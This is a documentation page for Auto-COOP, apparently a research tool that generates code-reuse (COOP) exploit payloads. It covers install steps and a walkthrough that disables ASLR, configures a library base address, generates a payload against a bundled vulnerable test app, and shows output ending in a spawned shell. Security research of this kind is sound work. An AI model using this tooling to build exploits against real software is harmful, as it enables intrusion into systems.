
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Installation &#8212; Auto-COOP  documentation</title>
    <link rel="stylesheet" href="_static/alabaster.css" type="text/css" />
    <link rel="stylesheet" href="_static/pygments.css" type="text/css" />
    <script type="text/javascript" id="documentation_options" data-url_root="./" src="_static/documentation_options.js"></script>
    <script type="text/javascript" src="_static/jquery.js"></script>
    <script type="text/javascript" src="_static/underscore.js"></script>
    <script type="text/javascript" src="_static/doctools.js"></script>
    <link rel="index" title="Index" href="genindex.html" />
    <link rel="search" title="Search" href="search.html" />
    <link rel="next" title="autocoop" href="modules.html" />
    <link rel="prev" title="Welcome to Auto-COOP’s documentation!" href="index.html" />
   
  <link rel="stylesheet" href="_static/custom.css" type="text/css" />
  
  
  <meta name="viewport" content="width=device-width, initial-scale=0.9, maximum-scale=0.9" />

  </head><body>
  

    <div class="document">
      <div class="documentwrapper">
        <div class="bodywrapper">
          

          <div class="body" role="main">
            
  <div class="section" id="installation">
<h1>Installation<a class="headerlink" href="#installation" title="Permalink to this headline">¶</a></h1>
<p>To run Auto-COOP, you need a python2 environment with angr and antlr4-python2-runtime installed. We recommend creating a python virtual environment. The steps to set one up with the proper packages are outlined below.</p>
<ol class="arabic">
<li><p class="first">create python2 virtualenv using virtualenv, virtualenvwrapper, conda, pipenv, or similar:</p>
<div class="highlight-default notranslate"><div class="highlight"><pre><span></span>$ virtualenv autocoop
</pre></div>
</div>
</li>
<li><p class="first">enter virtualenv &amp; install requirements:</p>
<div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="n">source</span> <span class="n">autocoop</span><span class="o">/</span><span class="nb">bin</span><span class="o">/</span><span class="n">activate</span>
<span class="n">pip</span> <span class="n">install</span> <span class="o">-</span><span class="n">r</span> <span class="n">requirements</span><span class="o">.</span><span class="n">txt</span>
</pre></div>
</div>
</li>
<li><p class="first">make sure that “.” is in the $PYTHONPATH:</p>
<div class="highlight-default notranslate"><div class="highlight"><pre><span></span>export PYTHONPATH=.:$PYTHONPATH
</pre></div>
</div>
</li>
</ol>
</div>
<div class="section" id="running-auto-coop">
<h1>Running Auto-COOP<a class="headerlink" href="#running-auto-coop" title="Permalink to this headline">¶</a></h1>
<p>To generate a payload with Auto-COOP, some setup is required. ASLR has to be disabled, and the exploit generation script has to be updated with the proper base library address for your system. Running the lxs script with everything configured correctly will lead to a call to ‘system(“/bin/sh”)’.</p>
<ol class="arabic">
<li><p class="first">disable aslr:</p>
<div class="highlight-default notranslate"><div class="highlight"><pre><span></span>$ cd exploitable_app
$ ./disable_aslr.sh
</pre></div>
</div>
</li>
<li><p class="first">run lxs:</p>
<div class="highlight-default notranslate"><div class="highlight"><pre><span></span>$ cd exploitable_app/testapp
$ ./run.sh
[+] allocated buffer at 0xa0000000
[+] number of parameters supplied 3
[+] loaded cmake-build-debug/libAPP.so at 0x7ffff7ff2000
...
</pre></div>
</div>
</li>
<li><p class="first">update lib base address in exploit_generator.py:</p>
<div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="o">&lt;</span><span class="n">Auto</span><span class="o">-</span><span class="n">COOP</span><span class="o">/</span><span class="n">tool</span><span class="o">/</span><span class="n">exploit_generator</span><span class="o">.</span><span class="n">py</span><span class="o">&gt;</span>
<span class="o">...</span>
<span class="n">config</span> <span class="o">=</span> <span class="n">Config</span><span class="p">(</span><span class="s2">&quot;exploitable_app/nodejs/libnode.so&quot;</span><span class="p">,</span>
                  <span class="mh">0x7ffff7ff2000</span><span class="p">,</span> <span class="o">&lt;--</span> <span class="n">UPDATE</span> <span class="n">THIS</span>
                  <span class="mh">0xa0000000</span><span class="p">,</span>
                  <span class="mi">4096</span><span class="p">,</span>
                  <span class="n">gadget_csv</span><span class="o">=</span><span class="s2">&quot;exploitable_app/nodejs/SDOutput/libnode.so.57-Virtual-metric.csv&quot;</span><span class="p">)</span>
<span class="o">...</span>
</pre></div>
</div>
</li>
<li><p class="first">generate the payload:</p>
<div class="highlight-default notranslate"><div class="highlight"><pre><span></span>$ python autocoop/exploit_generator.py esl_scripts/exploit_system.esl
</pre></div>
</div>
</li>
<li><p class="first">run lxs again:</p>
<div class="highlight-default notranslate"><div class="highlight"><pre><span></span>$ cd exploitable_app/testapp
$ ./run.sh
[+] allocated buffer at 0xa0000000
[+] number of parameters supplied 3
[+] loaded cmake-build-debug/libAPP.so at 0x7ffff7ff2000
[+] fd 3
[+] execute w00t..
$
</pre></div>
</div>
</li>
</ol>
</div>


          </div>
          
        </div>
      </div>
      <div class="sphinxsidebar" role="navigation" aria-label="main navigation">
        <div class="sphinxsidebarwrapper">
<h1 class="logo"><a href="index.html">Auto-COOP</a></h1>








<h3>Navigation</h3>
<p class="caption"><span class="caption-text">Contents:</span></p>
<ul class="current">
<li class="toctree-l1 current"><a class="current reference internal" href="#">Installation</a></li>
<li class="toctree-l1"><a class="reference internal" href="#running-auto-coop">Running Auto-COOP</a></li>
<li class="toctree-l1"><a class="reference internal" href="modules.html">Packages</a></li>
</ul>

<div class="relations">
<h3>Related Topics</h3>
<ul>
  <li><a href="index.html">Documentation overview</a><ul>
      <li>Previous: <a href="index.html" title="previous chapter">Welcome to Auto-COOP’s documentation!</a></li>
      <li>Next: <a href="modules.html" title="next chapter">autocoop</a></li>
  </ul></li>
</ul>
</div>
<div id="searchbox" style="display: none" role="search">
  <h3>Quick search</h3>
    <div class="searchformwrapper">
    <form class="search" action="search.html" method="get">
      <input type="text" name="q" />
      <input type="submit" value="Go" />
      <input type="hidden" name="check_keywords" value="yes" />
      <input type="hidden" name="area" value="default" />
    </form>
    </div>
</div>
<script type="text/javascript">$('#searchbox').show(0);</script>
        </div>
      </div>
      <div class="clearer"></div>
    </div>
    <div class="footer">
      &copy;2018, Richard Viehoever.
      
      |
      Powered by <a href="http://sphinx-doc.org/">Sphinx 1.7.6</a>
      &amp; <a href="https://github.com/bitprophet/alabaster">Alabaster 0.7.11</a>
      
      |
      <a href="_sources/installation.rst.txt"
          rel="nofollow">Page source</a>
    </div>

    

    
  </body>
</html>